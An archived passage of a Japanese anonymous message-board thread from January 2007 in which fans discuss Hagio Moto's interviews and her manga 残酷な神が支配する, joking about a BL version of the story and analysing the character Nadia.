古い感じが売りなんだなぁって思ってしまいそう。
描きたい事と絵と時代がエンゲージしてる作家だと思う。
感じ方はひとそれぞれだけど、
そんな酷い変化のしかたはしていない気もけどな。
変化し続けて行くってすごいなーとむしろ感心する。

203 :花と名無しさん:2007/01/22(月) 17:15:14 ID:???0
>>200
ごめん、「記憶なくす」の方が萩尾さん。
もともとそんなにお酒強い人じゃないっぽいしね。
昔、お友達だったかアシさんだったかが、「お酒はわりと
好きらしいんだけど、常時寝不足状態だから、ちょっと
飲んだだけでも前後不覚になってしまう」みたいな話してたのを
思い出した。

>>201
エッセイというよりインタビュー集みたいな感じ。
最初の方にマンガで各種の賞を受けた時のことが数ページ。
お友達の近況なんかもいろいろと……高千穂遥はものすごく痩せて、
新井素子は太ったそうなw


204 :花と名無しさん:2007/01/22(月) 20:50:59 ID:???0
文藝読んだら、恩田陸が萩尾さんと話した内容を少し言ってて、
萩尾さんはまた「吸血鬼モノをもう一度やりたい」って言ってたそうだよ。
・・・って既出だったらスマソ

205 :花と名無しさん:2007/01/22(月) 22:03:07 ID:???0
恩田陸といえば…
SF系雑誌の恩田氏と萩尾さんの対談で、
萩尾さんが「柄亀の最終回を漫画家仲間たちで考えた」とかいうのに笑った。

漫画家にしろ小説家にしろ、
「創作の妨げになる云々」などの理由で
他作家の作品を読まないという人がいるけど、
萩尾さんはいまだにすごい量を読んでるみたいだし、
漫画大好き!って感じが好きだなあ。


206 :花と名無しさん:2007/01/22(月) 22:04:47 ID:???0
>>203
201です。サンキュー! うむ、まあ一応買っておこうかな

>>204
それは楽しみだ。ぜひ描いてほしいなぁ

207 :花と名無しさん:2007/01/22(月) 22:07:16 ID:???0
>>205
BSマンガ夜話に出た時、源博雅(陰陽師)を
「ヒロくん」と呼んでいたのを思い出したw

208 :花と名無しさん:2007/01/23(火) 00:06:37 ID:???0
>>205
いっそ書いて欲しいと一瞬思ってしまったよw
芸風が違い過ぎて別物になりますが。

209 :花と名無しさん:2007/01/23(火) 08:15:20 ID:???0
萩尾さんが何かの対談で送られてくる漫画雑誌は全部読んでるって言ってた。
審査員とかやってるし出版社が勝手に送ってくれるのかな?
そこらへんの事情はよくわからんけど
男性向け萌え漫画とかも読んでるんなら感想聞きたいw
男性向けの百合とかさ

210 :花と名無しさん:2007/01/23(火) 10:45:19 ID:???0
独自のアイディアの泉を持ってるから他作家の作品読んでも創作の妨げに
なるなんことは無いんだろうな。

211 :花と名無しさん:2007/01/23(火) 11:51:31 ID:???O
「失踪日記」「うつうつひでお日記」と買っているが、モー様のネタもあるならこちらも
買いだな。情報ありがとう。

212 :211:2007/01/23(火) 11:52:50 ID:???O
ごめん、>>203へのレスね。

213 :花と名無しさん:2007/01/23(火) 17:41:58 ID:???0
残神を読んだ時、ふと思った。
かつての”少年愛”がただのエロ本に堕ちてしまっている近年のBLを
読んだ萩尾さんが、「どうだ、出来るものならこれだけ深く、美しく描いてみろ!」
と他のBL作家に見せつけるつもりで、描いた作品なんじゃないかと。

214 :花と名無しさん:2007/01/23(火) 20:20:25 ID:???0
>>213
自分は逆にBLの隆盛を見て、「最近はここまで描いてしまってもいいのか。
それなら私も以前よりもっとエグいものも描いてみよう」と思って描いた
んじゃないかと感じた。
よしながさんとの対談で「トーマの頃は自分も若かったので純愛路線だった」
って言ってたしあながち間違ってないと思う。


215 :花と名無しさん:2007/01/24(水) 05:47:32 ID:???0
残神は萩尾がずっと追求してる親子問題の決着版みたいなもんかと思ってたよ
萩尾(24年組)の同性愛はあくまでテーマを追及するための道具じゃないの?
>「トーマの頃は自分も若かったので純愛路線だった」
って言うなら時代よりも若さが一番の原因では?
70年代に時代が許せば残神を描けたかというとそうじゃないと思うし

そもそもBL自体娯楽ジャンルみたいなものだし
エロに特化してもしょうがないよ
市場が成熟してきたせいかわからないけど、良い作品もあるよ
アンチBLならゲイそのものを正面から捉えている
漫画じゃなきゃ意味ないと思う
(アンチBL自体、はいはいご苦労様って感じだし)

216 :花と名無しさん:2007/01/24(水) 11:02:46 ID:???0
>>213
それじゃ栗本薫だよww

217 :花と名無しさん:2007/01/24(水) 11:57:23 ID:???0
BLはファンタジーだしな。
残神がBLだったら強姦から始まってグレッグとジェルミが恋愛関係になるんだろう。


218 :花と名無しさん:2007/01/24(水) 12:04:41 ID:???0
残神がBLだったら
グレッグがもっと細身のイケメン親父になってるにちがいあるまい。
で、ジェルミはありとあらゆる登場人物(♂)にモテモテになるであろう。
イケメン紳士のグレッグと、若くてカッコいいイアンがジェルミを取り合い
サンドラはそんな親子をほほえましく思い(BLなのでホモに理解ある母親にキャラ変更。死なない)
ああ。
事件が起こらない。

219 :花と名無しさん:2007/01/24(水) 13:04:07 ID:???0
うわーラブコメだ。

220 :花と名無しさん:2007/01/24(水) 13:29:22 ID:???0
>>218
ちょーー!紅茶噴いたw 


221 :花と名無しさん:2007/01/24(水) 14:48:57 ID:???0
>>218
さかたやすこリメイクを妄想した

222 :花と名無しさん:2007/01/24(水) 16:11:45 ID:???0
>サンドラはそんな親子をほほえましく思い(BLなのでホモに理解ある母親にキャラ変更。死なない)

でも時々 ジェラってオーブンに頭つっこんだりとかね。

223 :花と名無しさん:2007/01/24(水) 17:00:06 ID:???0
そんな中、ナディアの扱いだけは残神と変わらなかったりして…

224 :花と名無しさん:2007/01/24(水) 18:13:27 ID:???0
グレッグとジェルミだけならBLっぽいとは1ミリも思わなかったけど、
イアンとジェルミは普通にBLっぽいと思った

225 :花と名無しさん:2007/01/24(水) 19:13:17 ID:???0
BLだったらナディアもホモに理解のある恋人だな。
幸せになってね、とか言って都合良く退場。

226 :花と名無しさん:2007/01/24(水) 20:17:40 ID:???0
>223
ナディアはイアンに何度も振られる役柄だから
(教会で1回、公園で2回、クリスマスキャンセルで3回、他にあったっけ)
BL設定でも違和感無いねw

227 :花と名無しさん:2007/01/24(水) 20:38:42 ID:???0
ナディアは、最初はジェルミの女神として
聖女みたいな登場の仕方だったのに、実はサンドラ2号だったというw
彼女の扱いの落差が一番びっくりだったかも。

でもイアンが「親父と女性の趣味は似てると言われる」と言ってるから、
萩尾さんは、はじめっから彼女をそうするつもりだったんだろうな…
ジェルミが一目惚れするのにも根拠があるんだよね。


228 :花と名無しさん:2007/01/24(水) 20:40:57 ID:???O
>>226
何度も掘られる に見えた……憑かれてんのかな

229 :花と名無しさん:2007/01/24(水) 21:25:32 ID:???0
ナディアが何度も「やさしくしよう」と思っては、愛されているジェルミを見てブチ切れ、
ひどいことを言ってしまう…というの、初めて読んだ時はムカついたんだけどw

久しぶりに読み直してみると、ナディアとしてはイアンを本当に好きだし、
「ボランティア恋愛」で可哀想がりたいだけだとしても、ジェルミをちゃんと好きなんだよね。
ただ単に ち ょ っ と だけ、相手に理想の王子様の夢を見て、依存してしまうだけの。
ナディアって、サンドラ2号であるだけでなく、グレッグやイアンにも似ている…

230 :花と名無しさん:2007/01/24(水) 22:21:56 ID:???0
まあナディア側に立ってみればかなり悲惨だけどね…
向こうから言い寄られて、付き合って上手くいってると思ったら
約束をスッぽかされるわ、男でしかも義理の弟が本命だとかいわれるわ、
お母ちゃんはヒステリックでお父ちゃんは家族を捨てて妹は超マイペースで
そりゃ厭味の一つも言いたくなるわさ。

231 :花と名無しさん:2007/01/24(水) 23:25:14 ID:???0
ナディア視点だといろんな災難にぶつかりながら成長する
フツーの少女漫画になりそうだ。

232 :花と名無しさん:2007/01/24(水) 23:38:03 ID:???0
両親は別居でそれぞれに浮気してて、
その母親の愛人が堂々と家に出入りしてて、
妹はメルヘンなメンヘラで、その同居人は母親の愛人の元カレで、
自分の彼氏は義弟と寝てて、
その義弟が妹のボーイフレンドでって、
とてもフツーの少女マンガにはならんと思うw

233 :花と名無しさん:2007/01/25(木) 00:34:07 ID:???0
その登場人物の男性全員から(特に理由もなく)求愛&レイープされたら今どきの少女漫画かも。

234 :花と名無しさん:2007/01/25(木) 00:59:13 ID:???0
>>232
いや…見てみたい。
不幸てんこ盛り状態からオーバーアクションの熊男を選び取って
怒りっぽいけどにぎやかな幸福人生を送っていくヒロイン。

熊男は髭を剃ると実はすっごいハンサム、というお約束も盛り込んでみる。

235 :花と名無しさん:2007/01/25(木) 01:10:30 ID:???0
そういえばよしながさんが、萩尾さんとの対談で、
ナディアのパパもゲイ(バイセクシャル)だし云々…と言っていたんですが
そんな描写、もしくはそれを示唆するような描写ってありましたっけ?

しかしそうすると、>>232で出て来る男性が漏れなくゲイかバイセクシャル
ってことになるのがすごいなw



75 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)